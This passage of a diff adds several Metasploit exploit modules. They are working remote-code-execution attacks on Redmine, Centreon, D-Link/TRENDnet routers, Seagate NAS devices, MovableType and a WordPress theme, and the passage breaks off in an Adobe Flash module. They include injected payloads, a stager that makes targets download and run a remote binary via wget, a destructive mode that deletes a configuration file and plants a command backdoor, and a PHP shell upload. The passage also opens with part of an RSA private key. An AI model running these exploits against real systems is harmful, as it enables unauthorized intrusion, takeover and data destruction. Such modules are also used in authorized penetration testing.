iYZd6xnZeZugaX51gQzKgN1QJ1y2sfTfLV6AwsPnieo7+vw2yk+Hl1i5uG9+XkTs
Ry45AkEAkk0MPL5YxqLKwH6wh2FHytr1jmENOkQu97k2TsuX0CzzDQApIY/eFkCj
QAgkI282MRsaTosxkYeG7ErsA5BJfwJAMOXYbHXp26PSYy4BjYzz4ggwf/dafmGz
ebQs+HXa8xGOreroPFFzfL8Eg8Ro0fDOi1lF7Ut/w330nrGxw1GCHQJAYtodBnLG
XLMvDHFG2AN1spPyBkGTUOH2OK2TZawoTmOPd3ymK28LriuskwxrceNb96qHZYCk
86DC8q8p2OTzYwJANXzRM0SGTqSDMnnid7PGlivaQqfpPOx8MiFR/cGr2dT1HD7y
x6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg==
-----END RSA PRIVATE KEY-----
EOF
end
end

76
platforms/linux/remote/41695.rb Executable file
View file

@ -0,0 +1,76 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Redmine SCM Repository Arbitrary Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in the
Redmine repository controller. The flaw is triggered when a rev parameter
is passed to the command line of the SCM tool without adequate filtering.
},
'Author' => [ 'joernchen <joernchen[at]phenoelit.de>' ], #Phenoelit
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2011-4929'],
['OSVDB', '70090'],
['URL', 'http://www.redmine.org/news/49' ]
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
#'RequiredCmd' => 'generic telnet',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Dec 19 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "The full URI path to the project", "/projects/1/"]),
], self.class)
end
def exploit
command = Rex::Text.uri_encode(payload.encoded)
urlconfigdir = normalize_uri(datastore['URI'], "/repository/annotate") + "?rev=`#{command}`"
res = send_request_raw({
'uri' => urlconfigdir,
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 25)
if (res)
print_status("The server returned: #{res.code} #{res.message}")
else
print_status("No response from the server")
end
handler
end
end

138
platforms/linux/webapps/41676.rb Executable file
View file

@ -0,0 +1,138 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Centreon SQL and Command Injection',
'Description' => %q{
This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
Enterprise Server 2.2 and prior. Due to a combination of SQL injection and command
injection in the displayServiceStatus.php component, it is possible to execute arbitrary
commands as long as there is a valid session registered in the centreon.session table.
In order to have a valid session, all it takes is a successful login from anybody.
The exploit itself does not require any authentication.
This module has been tested successfully on Centreon Enterprise Server 2.2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'MaZ', # Vulnerability Discovery and Analysis
'juan vazquez' # Metasploit Module
],
'References' =>
[
['CVE', '2014-3828'],
['CVE', '2014-3829'],
['US-CERT-VU', '298796'],
['URL', 'http://seclists.org/fulldisclosure/2014/Oct/78']
],
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Payload' =>
{
'Space' => 1500, # having into account 8192 as max URI length
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic python gawk bash-tcp netcat ruby openssl'
}
},
'Targets' =>
[
['Centreon Enterprise Server 2.2', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 15 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the Centreon Application', '/centreon'])
], self.class)
end
def check
random_id = rand_text_numeric(5 + rand(8))
res = send_session_id(random_id)
unless res && res.code == 200 && res.headers['Content-Type'] && res.headers['Content-Type'] == 'image/gif'
return Exploit::CheckCode::Safe
end
injection = "#{random_id}' or 'a'='a"
res = send_session_id(injection)
if res && res.code == 200
if res.body && res.body.to_s =~ /sh: graph: command not found/
return Exploit::CheckCode::Vulnerable
elsif res.headers['Content-Type'] && res.headers['Content-Type'] == 'image/gif'
return Exploit::CheckCode::Detected
end
end
Exploit::CheckCode::Safe
end
def exploit
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited")
elsif check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited. Possibly because there's nothing in the centreon.session table. Perhaps try again later?")
end
print_status("Exploiting...")
random_id = rand_text_numeric(5 + rand(8))
random_char = rand_text_alphanumeric(1)
session_injection = "#{random_id}' or '#{random_char}'='#{random_char}"
template_injection = "' UNION ALL SELECT 1,2,3,4,5,CHAR(59,#{mysql_payload}59),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- /**"
res = send_template_id(session_injection, template_injection)
if res && res.body && res.body.to_s =~ /sh: --imgformat: command not found/
vprint_status("Output: #{res.body}")
end
end
def send_session_id(session_id)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.to_s, 'include', 'views', 'graphs', 'graphStatus', 'displayServiceStatus.php'),
'vars_get' =>
{
'session_id' => session_id
}
)
res
end
def send_template_id(session_id, template_id)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.to_s, 'include', 'views', 'graphs', 'graphStatus', 'displayServiceStatus.php'),
'vars_get' =>
{
'session_id' => session_id,
'template_id' => template_id
}
}, 3)
res
end
def mysql_payload
p = ''
payload.encoded.each_byte { |c| p << "#{c},"}
p
end
end

190
platforms/linux/webapps/41677.rb Executable file
View file

@ -0,0 +1,190 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking # Only tested on Emulated environment
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link/TRENDnet NCC Service Command Injection',
'Description' => %q{
This module exploits a remote command injection vulnerability on several routers. The
vulnerability exists in the ncc service, while handling ping commands. This module has
been tested on a DIR-626L emulated environment. Several D-Link and TRENDnet devices
are reported as affected, including: D-Link DIR-626L (Rev A) v1.04b04, D-Link DIR-636L
(Rev A) v1.04, D-Link DIR-808L (Rev A) v1.03b05, D-Link DIR-810L (Rev A) v1.01b04, D-Link
DIR-810L (Rev B) v2.02b01, D-Link DIR-820L (Rev A) v1.02B10, D-Link DIR-820L (Rev A)
v1.05B03, D-Link DIR-820L (Rev B) v2.01b02, D-Link DIR-826L (Rev A) v1.00b23, D-Link
DIR-830L (Rev A) v1.00b07, D-Link DIR-836L (Rev A) v1.01b03 and TRENDnet TEW-731BR (Rev 2)
v2.01b01
},
'Author' =>
[
'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery and initial PoC
'Tiago Caetano Henriques', # Vulnerability discovery and initial PoC
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-1187'],
['BID', '72816'],
['URL', 'https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2'],
['URL', 'http://seclists.org/fulldisclosure/2015/Mar/15'],
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10052']
],
'Targets' =>
# Only tested on D-Link DIR-626L where wget is available
[
[ 'Linux mipsel Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
],
[ 'Linux mipsbe Payload',
{
'Arch' => ARCH_MIPSBE,
'Platform' => 'linux'
}
],
],
'DisclosureDate' => 'Feb 26 2015',
'DefaultTarget' => 0))
register_options(
[
OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]),
OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]),
OptString.new('TARGETURI', [true, 'The base path to the vulnerable application area', '/ping.ccp']),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 10])
], self.class)
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
# unknown if other devices also using mini_httpd
if res && [500].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exec_command(cmd, timeout = 20)
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'encode_params' => false,
'vars_post' => {
'ccp_act' => 'ping_v6',
'ping_addr' => '$(' + cmd + ')'
}
}, timeout)
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def primer
@payload_url = get_uri
wget_payload
end
def exploit
print_status("Accessing the vulnerable URL...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL")
end
print_status("Exploiting...")
@pl = generate_payload_exe
@payload_url = ''
@dropped_elf = rand_text_alpha(rand(5) + 3)
if datastore['EXTURL'].blank?
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
end
chmod_payload
exec_payload
else
@payload_url = datastore['EXTURL']
wget_payload
chmod_payload
exec_payload
end
end
def wget_payload
upload_path = File.join(datastore['WRITABLEDIR'], @dropped_elf)
cmd = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{upload_path}"
print_status("Downloading the payload to the target machine...")
res = exec_command(cmd)
if res && [200].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/
register_files_for_cleanup(upload_path)
else
fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")
end
end
def chmod_payload
cmd = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"
print_status("chmod the payload...")
res = exec_command(cmd, 1)
unless res
fail_with(Failure::Unknown, "#{peer} - Unable to chmod payload")
end
Rex.sleep(1)
end
def exec_payload
cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf)
print_status("Executing the payload...")
res = exec_command(cmd, 1)
unless res
fail_with(Failure::Unknown, "#{peer} - Unable to exec payload")
end
Rex.sleep(1)
end
# Handle incoming requests to the HTTP server
def on_request_uri(cli, request)
print_status("Request: #{request.uri}")
if request.uri =~ /#{Regexp.escape(get_resource)}/
print_status('Sending payload...')
send_response(cli, @pl)
end
end
end

353
platforms/linux/webapps/41678.rb Executable file
View file

@ -0,0 +1,353 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Seagate Business NAS Unauthenticated Remote Command Execution',
'Description' => %q{
Some Seagate Business NAS devices are vulnerable to command execution via a local
file include vulnerability hidden in the language parameter of the CodeIgniter
session cookie. The vulnerability manifests in the way the language files are
included in the code on the login page, and hence is open to attack from users
without the need for authentication. The cookie can be easily decrypted using a
known static encryption key and re-encrypted once the PHP object string has been
modified.
This module has been tested on the STBN300 device.
},
'Author' => [
'OJ Reeves <oj[at]beyondbinary.io>' # Discovery and Metasploit module
],
'References' => [
['CVE', '2014-8684'],
['CVE', '2014-8686'],
['CVE', '2014-8687'],
['EDB', '36202'],
['URL', 'http://www.seagate.com/au/en/support/external-hard-drives/network-storage/business-storage-2-bay-nas/'],
['URL', 'https://beyondbinary.io/advisory/seagate-nas-rce/']
],
'DisclosureDate' => 'Mar 01 2015',
'Privileged' => true,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Payload' => {'DisableNops' => true},
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'License' => MSF_LICENSE
))
register_options([
OptString.new('TARGETURI', [true, 'Path to the application root', '/']),
OptString.new('ADMINACCOUNT', [true, 'Name of the NAS admin account', 'admin']),
OptString.new('COOKIEID', [true, 'ID of the CodeIgniter session cookie', 'ci_session']),
OptString.new('XORKEY', [true, 'XOR Key used for the CodeIgniter session', '0f0a000d02011f0248000d290d0b0b0e03010e07'])
])
end
#
# Write a string value to a serialized PHP object without deserializing it first.
# If the value exists it will be updated.
#
def set_string(php_object, name, value)
prefix = "s:#{name.length}:\"#{name}\";s:"
if php_object.include?(prefix)
# the value already exists in the php blob, so update it.
return php_object.gsub("#{prefix}\\d+:\"[^\"]*\"", "#{prefix}#{value.length}:\"#{value}\"")
end
# the value doesn't exist in the php blob, so create it.
count = php_object.split(':')[1].to_i + 1
php_object.gsub(/a:\d+(.*)}$/, "a:#{count}\\1#{prefix}#{value.length}:\"#{value}\";}")
end
#
# Findez ze holez!
#
def check
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri),
'method' => 'GET',
'headers' => {
'Accept' => 'text/html'
}
)
if res && res.code == 200
headers = res.to_s
# validate headers
if headers.include?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28')
# and make sure that the body contains the title we'd expect
if res.body.include?('Login to BlackArmor')
return Exploit::CheckCode::Appears
end
end
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
# something went wrong, assume safe.
end
Exploit::CheckCode::Safe
end
#
# Executez ze sploitz!
#
def exploit
# Step 1 - Establish a session with the target which will give us a PHP object we can
# work with.
begin
print_status("Establishing session with target ...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri),
'method' => 'GET',
'headers' => {
'Accept' => 'text/html'
}
})
if res && res.code == 200 && res.to_s =~ /#{datastore['COOKIEID']}=([^;]+);/
cookie_value = $1.strip
else
fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.")
end
# Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly
# then update it so that it's an admin session before re-encrypting
print_status("Upgrading session to administrator ...")
php_object = decode_cookie(cookie_value)
vprint_status("PHP Object: #{php_object}")
admin_php_object = set_string(php_object, 'is_admin', 'yes')
admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT'])
vprint_status("Admin PHP object: #{admin_php_object}")
admin_cookie_value = encode_cookie(admin_php_object)
# Step 3 - Extract the current host configuration so that we don't lose it.
host_config = nil
# This time value needs to be consistent across calls
config_time = ::Time.now.to_i
begin
print_status("Extracting existing host configuration ...")
res = send_request_cgi(
'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'),
'method' => 'GET',
'headers' => {
'Accept' => 'text/html'
},
'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
'vars_get' => {
'_' => config_time
}
)
if res && res.code == 200
res.body.split("\r\n").each do |l|
if l.include?('general_setup')
host_config = l
break
end
end
else
fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.")
end
print_good("Host configuration extracted.")
vprint_status("Host configuration: #{host_config}")
# Step 4 - replace the host device description with a custom payload that can
# be used for LFI. We have to keep the payload small because of size limitations
# and we can't put anything in with '$' in it. So we need to make a simple install
# payload which will write a required payload to disk that can be executes directly
# as the last part of the payload. This will also be self-deleting.
param_id = rand_text_alphanumeric(3)
# There are no files on the target file system that start with an underscore
# so to allow for a small file size that doesn't collide with an existing file
# we'll just prefix it with an underscore.
payload_file = "_#{rand_text_alphanumeric(3)}.php"
installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));"
stager = Rex::Text.encode_base64(installer)
stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>")
vprint_status("Stager: #{stager}")
# Butcher the XML directly rather than attempting to use REXML. The target XML
# parser is way to simple/flaky to deal with the proper stuff that REXML
# spits out.
desc_start = host_config.index('" description="') + 15
desc_end = host_config.index('"', desc_start)
xml_payload = host_config[0, desc_start] +
stager + host_config[desc_end, host_config.length]
vprint_status(xml_payload)
# Step 5 - set the host description to the stager so that it is written to disk
print_status("Uploading stager ...")
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
'method' => 'POST',
'headers' => {
'Accept' => 'text/html'
},
'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
'vars_get' => {
'_' => config_time
},
'vars_post' => {
'general_setup' => xml_payload
}
)
unless res && res.code == 200
fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).")
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).")
end
print_good("Stager uploaded.")
# Step 6 - Invoke the stage, passing in a self-deleting php script body.
print_status("Executing stager ...")
payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00")
payload_cookie_value = encode_cookie(payload_php_object)
self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>"
errored = false
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri),
'method' => 'POST',
'headers' => {
'Accept' => 'text/html'
},
'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}",
'vars_post' => {
param_id => Rex::Text.encode_base64(self_deleting_payload)
}
)
if res && res.code == 200
print_good("Stager execution succeeded, payload ready for execution.")
else
print_error("Stager execution failed (invalid result).")
errored = true
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
print_error("Stager execution failed (unable to establish connection).")
errored = true
end
# Step 7 - try to restore the previous configuration, allowing exceptions
# to bubble up given that we're at the end. This step is important because
# we don't want to leave a trail of junk on disk at the end.
print_status("Restoring host config ...")
res = send_request_cgi(
'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
'method' => 'POST',
'headers' => {
'Accept' => 'text/html'
},
'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
'vars_get' => {
'_' => config_time
},
'vars_post' => {
'general_setup' => host_config
}
)
# Step 8 - invoke the installed payload, but only if all went to plan.
unless errored
print_status("Executing payload at #{normalize_uri(target_uri, payload_file)} ...")
res = send_request_cgi(
'uri' => normalize_uri(target_uri, payload_file),
'method' => 'GET',
'headers' => {
'Accept' => 'text/html'
},
'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}"
)
end
end
#
# Take a CodeIgnitor cookie and pull out the PHP object using the XOR
# key that we've been given.
#
def decode_cookie(cookie_content)
cookie_value = Rex::Text.decode_base64(URI.decode(cookie_content))
pass = xor(cookie_value, datastore['XORKEY'])
result = ''
(0...pass.length).step(2).each do |i|
result << (pass[i].ord ^ pass[i + 1].ord).chr
end
result
end
#
# Take a serialised PHP object cookie value and encode it so that
# CodeIgniter thinks it's legit.
#
def encode_cookie(cookie_value)
rand = Rex::Text.sha1(rand_text_alphanumeric(40))
block = ''
(0...cookie_value.length).each do |i|
block << rand[i % rand.length]
block << (rand[i % rand.length].ord ^ cookie_value[i].ord).chr
end
cookie_value = xor(block, datastore['XORKEY'])
cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value))
vprint_status("Cookie value: #{cookie_value}")
cookie_value
end
#
# XOR a value against a key. The key is cycled.
#
def xor(string, key)
result = ''
string.bytes.zip(key.bytes.cycle).each do |s, k|
result << (s ^ k)
end
result
end
#
# Simple XML substitution because the target XML handler isn't really
# full blown or smart.
#
def xml_encode(str)
str.gsub(/</, '<').gsub(/>/, '>')
end
end

233
platforms/linux/webapps/41697.rb Executable file
View file

@ -0,0 +1,233 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'SixApart MovableType Storable Perl Code Execution',
'Description' => %q{
This module exploits a serialization flaw in MovableType before 5.2.12 to execute
arbitrary code. The default nondestructive mode depends on the target server having
the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths.
The destructive mode of operation uses only required MovableType dependencies,
but it will noticeably corrupt the MovableType installation.
},
'Author' =>
[
'John Lightsey',
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2015-1592' ],
[ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ],
],
'Privileged' => false, # web server context
'Payload' =>
{
'DisableNops' => true,
'BadChars' => ' ',
'Space' => 1024,
},
'Compat' =>
{
'PayloadType' => 'cmd'
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' => [['Automatic', {}]],
'DisclosureDate' => 'Feb 11 2015',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'MoveableType cgi-bin directory path', '/cgi-bin/mt/']),
OptBool.new('DESTRUCTIVE', [true, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false])
], self.class
)
end
=begin
#!/usr/bin/perl
# generate config parameters for injection checks
use Storable;
{
package XXXCHECKXXX;
sub STORABLE_thaw {
return 1;
}
sub STORABLE_freeze {
return 1;
}
}
my $check_obj = bless { ignore => 'this' }, XXXCHECKXXX;
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj});
$frozen = unpack 'H*', $frozen;
print "LFI test for storable flaw is: $frozen\n";
{
package DateTime;
use overload '+' => sub { 'ignored' };
}
=end
def check
vprint_status("Sending storable test injection for XXXCHECKXXX.pm load failure")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
'vars_get' => {
'__mode' => 'retry',
'step' => 'configure',
'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078'
}
})
unless res && res.code == 200 && res.body.include?("Can't locate XXXCHECKXXX.pm")
vprint_status("Failed XXXCHECKXXX.pm load test");
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Vulnerable
end
def exploit
if datastore['DESTRUCTIVE']
exploit_destructive
else
exploit_nondestructive
end
end
=begin
#!/usr/bin/perl
# Generate nondestructive config parameter for RCE via Object::MultiType
# and Try::Tiny. The generated value requires minor modification to insert
# the payload inside the system() call and resize the padding.
use Storable;
{
package Object::MultiType;
use overload '+' => sub { 'ingored' };
}
{
package Object::MultiType::Saver;
}
{
package DateTime;
use overload '+' => sub { 'ingored' };
}
{
package Try::Tiny::ScopeGuard;
}
my $try_tiny_loader = bless {}, 'DateTime';
my $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver';
my $multitype_coderef = bless \$multitype_saver, 'Object::MultiType';
my $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\n\n};system(q{});' . ('#' x 1025) . "\nexit;"], 'Try::Tiny::ScopeGuard';
my $data = [$try_tiny_loader, $try_tiny_executor];
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
$frozen = unpack 'H*', $frozen;
print "RCE payload requiring Object::MultiType and DateTime: $frozen\n";
=end
def exploit_nondestructive
print_status("Using nondestructive attack method")
config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b"
config_payload << payload.encoded.unpack('H*')[0]
config_payload << "7d293b"
config_payload << "23" * (1025 - payload.encoded.length)
config_payload << "0a657869743b"
print_status("Sending payload (#{payload.raw.length} bytes)")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
'vars_get' => {
'__mode' => 'retry',
'step' => 'configure',
'config' => config_payload
}
}, 5)
end
=begin
#!/usr/bin/perl
# Generate destructive config parameter to unlink mt-config.cgi
use Storable;
{
package CGITempFile;
}
my $unlink_target = "mt-config.cgi";
my $cgitempfile = bless \$unlink_target, "CGITempFile";
my $data = [$cgitempfile];
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
$frozen = unpack 'H*', $frozen;
print "RCE unlink payload requiring CGI: $frozen\n";
=end
def exploit_destructive
print_status("Using destructive attack method")
# First we need to delete mt-config.cgi using the storable injection
print_status("Sending storable injection to unlink mt-config.cgi")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
'vars_get' => {
'__mode' => 'retry',
'step' => 'configure',
'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769'
}
})
if res && res.code == 200
print_status("Successfully sent unlink request")
else
fail_with(Failure::Unknown, "Error sending unlink request")
end
# Now we rewrite mt-config.cgi to accept a payload
print_status("Rewriting mt-config.cgi to accept the payload")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
'vars_get' => {
'__mode' => 'next_step',
'step' => 'optional',
'default_language' => 'en_us',
'email_address_main' => "x\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\n\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1",
'set_static_uri_to' => '/',
'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/',
}
})
if res && res.code == 200
print_status("Successfully sent mt-config rewrite request")
else
fail_with(Failure::Unknown, "Error sending mt-config rewrite request")
end
# Finally send the payload
print_status("Sending payload request")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt.cgi'),
'vars_get' => {
'xyzzy' => payload.encoded,
}
}, 5)
end
end

98
platforms/linux/webapps/41698.rb Executable file
View file

@ -0,0 +1,98 @@
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'socket'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HTTP::Wordpress
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress Holding Pattern Theme Arbitrary File Upload',
'Description' => %q{
This module exploits a file upload vulnerability in all versions of the
Holding Pattern theme found in the upload_file.php script which contains
no session or file validation. It allows unauthenticated users to upload
files of any type and subsequently execute PHP scripts in the context of
the web server.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Alexander Borg', # Vulnerability disclosure
'Rob Carr <rob[at]rastating.com>' # Metasploit module
],
'References' =>
[
['CVE', '2015-1172'],
['WPVDB', '7784'],
['PACKETSTORM', '130282']
],
'DisclosureDate' => 'Feb 11 2015',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['holding_pattern', {}]],
'DefaultTarget' => 0
))
end
def check
check_theme_version_from_readme('holding_pattern')
end
def rhost
datastore['RHOST']
end
def holding_pattern_uploads_url
normalize_uri(wordpress_url_themes, 'holding_pattern', 'uploads/')
end
def holding_pattern_uploader_url
normalize_uri(wordpress_url_themes, 'holding_pattern', 'admin', 'upload-file.php')
end
def generate_mime_message(payload, payload_name)
data = Rex::MIME::Message.new
target_ip = IPSocket.getaddress(rhost)
field_name = Rex::Text.md5(target_ip)
# In versions 1.2 and 1.3 of the theme, the upload directory must
# be encoded in base64 and sent with the request. To maintain
# compatibility with the hardcoded path of ../uploads in prior
# versions, we will send the same path in the request.
upload_path = Rex::Text.encode_base64('../uploads')
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"")
data.add_part(upload_path, nil, nil, 'form-data; name="upload_path"')
data
end
def exploit
print_status("Preparing payload...")
payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php"
data = generate_mime_message(payload, payload_name)
print_status("Uploading payload...")
res = send_request_cgi(
'method' => 'POST',
'uri' => holding_pattern_uploader_url,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
)
fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200
payload_url = normalize_uri(holding_pattern_uploads_url, payload_name)
print_status("Executing the payload at #{payload_url}")
register_files_for_cleanup(payload_name)
send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5)
end
end

191
platforms/multiple/local/41681.rb Executable file
View file

@ -0,0 +1,191 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser
